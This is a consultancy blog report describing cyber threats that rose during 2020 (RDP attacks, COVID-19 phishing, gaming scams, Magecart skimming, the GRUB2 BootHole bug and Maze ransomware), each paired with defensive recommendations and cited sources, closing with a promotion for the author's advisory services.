Part and parcel of a Data Protection programme is an awareness of the cyber security threats that are out there. A cyber security threat can be defined as “the possibility of a successful cyber-attack that aims to gain unauthorized access, damage, disrupt, or steal an information technology asset, computer network, intellectual property or any other form of sensitive data.” (Tunggal, 2020). In this report, I’ll be describing a number of key threats that have emerged during 2020 and the accompanying pandemic.

RDP Attacks

Remote Desktop Attacks are nothing new, however, they do appear to be growing in prevalence. Telemetry from ESET’s Brute-Force Attack Protection shows a marked upswing in the number of unique clients reporting RDP attack attempts in the wild.

Figure 1: Trend of RDP attack attempts against unique clients per day (ESET, 2020)

RDP as a protocol is particularly attractive as a target, given that many employees access their corporate resources via this protocol. With work-from-home (WFH) becoming all the more popular, many of these connections are exposed to the public internet. As per McAfee Labs, the number of ports exposed to the web has grown from 3 million in January 2020, to roughly 4.5 million in March 2020 (Roccia, 2020).

Recommendations

There are secure methods to connect to RDP, and a number of recommendations can be made for ensuring this security. Microsoft issued a press release detailing a fix for Remote Code Execution in older versions of Windows, dating back to May 2019 (Microsoft Security Response Center, 2019). It is recommended that your operating system is patched to the current level as well as considering the options below (Roccia, 2020).

  • Disable internet-facing RDP on port 3389
  • Require strong and complex passwords
  • Use additional layers of authentication (MFA)
  • Use a VPN to access RDP infrastructure from outside
  • Install endpoint security
  • Update and replace outdated operating systems (prior to Windows 2012)

In addition to the above, if you are using Microsoft Azure hosted services, use what is known as a Bastion Host to access your systems. This allows you to connect to your virtual machines via the web browser, taking advantage of Azure’s multifactor authentication and other benefits (Microsoft, 2020).

COVID-19 Phishing

The COVID-19 pandemic has proven to be a key vector of attack for phishers, where new attacks using socially engineered emails have bypassed security checks, and in some cases common sense (Montalbano, 2020).

The threat in question claimed to show important information about COVID-19 statistics in the reader’s area. It evaded Advanced Threat Protection (ATP) by impersonating a valid domain with a spoofed IP address. Due to the mail delivery being performed by a proxy that appeared to be legitimate, the email slipped past basic security checks such as DKIM and SPF.

Once ATP has been evaded, the reliance is on social engineering and spoofing the email address of a trusted source – much like other phishing campaigns. Users who click on the links in the email are taken to a highly sophisticated and well-designed fake Microsoft login, where their credentials are harvested.

Recommendations

As with any phishing, it is relatively easily mitigated by using multifactor authentication. Enabling MFA or 2FA on your hosted services dramatically reduces the success rate of phishing attacks (Saunders, 2020). Instructions and links to enable MFA on a multitude of services are available on our blog, at: https://www.rossgsaunders.com/2020/01/what-is-multi-factor-authentication-mfa/

Gaming

Online gaming has seen a sharp rise while people are working from home. Counter-Strike: Global Offensive, a popular game on the Steam platform, saw a rise to over 1 million concurrent players between the 18th of March and 2nd of June, 2020 (Steam Database, 2020).

Attacks on gaming users often takes the form of phishing and redirects to malicious gaming-related websites. Fake Steam platform sites increased by 40% between February and April, and the most targeted games within the platform are Minecraft, Counter-Strike: Global Offensive, and The Witcher 3: Wild Hunt respectively (Kaspersky Securelist, 2020).

Traditionally, these attacks would be to gain access to a user’s wallet. But, with the increase in usage of work computers at home, and more importantly home computers on poorly prepared corporate networks, attackers are able to exploit gaming vulnerabilities to access corporate infrastructure (Kaspersky Securelist, 2020).

Recommendations

Ensure that your employees are aware of the very real cyber-security threat within the gaming environment. Updating your “Bring Your Own Device” (BYOD) policy is key, along with your corporate restrictions on applications and gaming. Managed anti-virus and Mobile Device Management are key value-adds in the fight against these threats. Microsoft365 (formerly Office365) and Google’s G-Suite both have built in Mobile Device Management that can be activated, with Microsoft InTune being particularly powerful on their enterprise packages.

Magecart

Magecart – an umbrella criminal group – has been attacking e-commerce websites since 2014. Recently, the number of compromised has risen substantially. Their modus operandi is to inject malicious code into online shopping sites, thereby allowing them to skim credit card information on checkout (Ferguson, 2019).

The most affected eCommerce platform for the attacks is Magento, however, other platforms are also affected, such as Shopify, OpenCart, OSCommerce and WordPress (Ferguson, 2019). Over 570 sites in 55 countries have been targeted between April 2017 and July 2020, with two South African eCommerce sites included in the highest traffic attacks (Gemini Advisory, 2020).

Recommendations

Ensure that your eCommerce site is regularly updated. Updates ensure that your site remains protected against vulnerabilities that may be exploited. It is worthwhile having your site and code audited by a third-party to ensure that you have not been affected. Finally, ensure that your administration, FTP and database logins are using secure connection methods and have complex, difficult to guess passwords.

GRUB2

Billions of Windows and Linux devices are vulnerable to cyberattacks stemming from a bug in the GRUB2 bootloader, researchers are warning.

GRUB2 (which stands for the GRand Unified Bootloader version 2) is the default bootloader for the majority of computing systems. Its job is to manage part of the start-up process – it either presents a menu and awaits user input, or automatically transfers control to an operating system kernel.

From https://threatpost.com/billions-of-devices-impacted-secure-boot-bypass/157843/

A recent bug discovered in the GRUB2 bootloader could allow attackers to compromise servers and load malware in corporate and IoT networks. The bug, known as “BootHole”, allows an attacker to bypass the Secure Boot protections between startup of a computer, and handover to the Operating System (Seals, 2020).

Given the complexity of changing the way GRUB2 functions and the sheer volume of systems making use of GRUB2, fixes and patches will be ongoing, often in a reactive manner. There is no easy mitigation (Red Hat, 2020).

The fault not only affects Linux, but also Microsoft Windows systems that make use of the Third-Party UEFI certificate authority. Both hardware and software providers will need to provide regular updates and certificate revocation lists to mitigate the issue in an ongoing manner (Seals, 2020).

Recommendations

Ensure that you maintain your updates within your environments. Various providers have issued their own advisories, it is recommended that you search for these and apply any mitigations given. Many of these updates will be manual given the risk of damage to bootloaders and “bricking” systems (Seals, 2020).

Eclypsium research, who initially discovered and disclosed the bug to manufacturers, have recommended the following steps be taken (Eclypsium, 2020). The original report is available here: https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/

  1. Start monitoring the contents of the bootloader partition (EFI system partition).
  2. Continue to install OS updates as usual across desktops, laptops, servers, and appliances.
  3. Test the revocation list update.
  4. To close this vulnerability, you need to deploy the revocation update. Make sure that all bootable media has received OS updates first, roll it out slowly to only a small number of devices at a time, and incorporate lessons learned from testing as part of this process.
  5. Engage with your third-party vendors to validate they are aware of, and are addressing, this issue.

Maze Ransomware

Maze is a particularly dangerous new-generation ransomware. As per most ransomware threats, it involves encrypting your computer and extorting money from you in order to decrypt and recover your files. What makes Maze much more dangerous than other ransomware out there, is that it also sends your data to the attackers (Cluley, 2020).

After data is sent to the attackers and a ransom demand is issued, an additional threat is raised in that the attackers “weaponise” data protection legislation and stock exchange requirements. Should you not pay the ransom, they leak your information out via their own website and inform the regulator and/or stock exchange of the breach (Cluley, 2020; Mundo, 2020).

Recommendations

Always be vigilant about downloads and attachments sent to you. Do not open files that you are not expecting and be sure to run reputable anti-malware and anti-virus solutions. Lastly, as with any ransomware, ensure you have backups of your data in order to recover.

Ross G Saunders Consulting offers a number of solutions that can drive your compliance with Privacy and Cyber Security; from affordable 16 week group coaching programmes to comply on your own, through to advisory retainers and full programme management. To find out more about the offerings available, book time directly with Ross using the calendar below.


References

Cluley, G., 2020. Maze Ransomware – What You Need to Know. [Online]
Available at: https://www.tripwire.com/state-of-security/featured/maze-ransomware-what-you-need-to-know/
[Accessed 20 August 2020].

Eclypsium, 2020. There’s a hole in the boot. [Online]
Available at: https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/
[Accessed 25 August 2020].

Ferguson, S., 2019. Magecart Group Continues Targeting E-Commerce Sites. [Online]
Available at: https://www.bankinfosecurity.com/magecart-group-continues-targeting-e-commerce-sites-a-12996
[Accessed 25 August 2020].

Gemini Advisory, 2020. “Keeper” Magecart Group Infects 570 Sites. [Online]
Available at: https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/
[Accessed 25 August 2020].

Kaspersky Securelist, 2020. Do cybercriminals play cyber games during quarantine?. [Online]
Available at: https://securelist.com/do-cybercriminals-play-cyber-games-during-quarantine/97241/
[Accessed 1 September 2020].

Microsoft Security Response Center, 2019. Prevent a worm by updating Remote Desktop Services (CVE-2019-0708). [Online]
Available at: https://msrc-blog.microsoft.com/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
[Accessed 30 August 2020].

Microsoft, 2020. What is Azure Bastion?. [Online]
Available at: https://docs.microsoft.com/en-us/azure/bastion/bastion-overview
[Accessed 2 September 2020].

Montalbano, E., 2020. Top Email Protections Fail in Latest COVID-19 Phishing Campaign. [Online]
Available at: https://threatpost.com/top-email-protections-fail-covid-19-phishing/154329/
[Accessed 15 August 2020].

Mundo, A., 2020. Ransomware Maze. [Online]
Available at: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
[Accessed 15 August 2020].

Red Hat, 2020. Boot Hole Vulnerability – GRUB 2 boot loader – CVE-2020-10713. [Online]
Available at: https://access.redhat.com/security/vulnerabilities/grub2bootloader
[Accessed 30 August 2020].

Roccia, T., 2020. Cybercriminals Actively Exploiting RDP to Target Remote Organizations. [Online]
Available at: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cybercriminals-actively-exploiting-rdp-to-target-remote-organizations/
[Accessed 20 August 2020].

Saunders, R., 2020. What is Multi-factor Authentication (MFA)?. [Online]
Available at: https://www.rossgsaunders.com/2020/01/what-is-multi-factor-authentication-mfa/
[Accessed 15 August 2020].

Seals, T., 2020. Billions of Devices Impacted by Secure Boot Bypass. [Online]
Available at: https://threatpost.com/billions-of-devices-impacted-secure-boot-bypass/157843/
[Accessed 25 August 2020].

Steam Database, 2020. Counter-Strike: Global Offensive. [Online]
Available at: https://steamdb.info/app/730/graphs/
[Accessed 1 September 2020].

Tunggal, A. T., 2020. What is a Cyber Threat?. [Online]
Available at: https://www.upguard.com/blog/cyber-threat
[Accessed 2 August 2020].

A big thank you to Jennifer from Silver17 Consulting for her fantastic research assistance on this piece!

Share This

Share this post with your friends!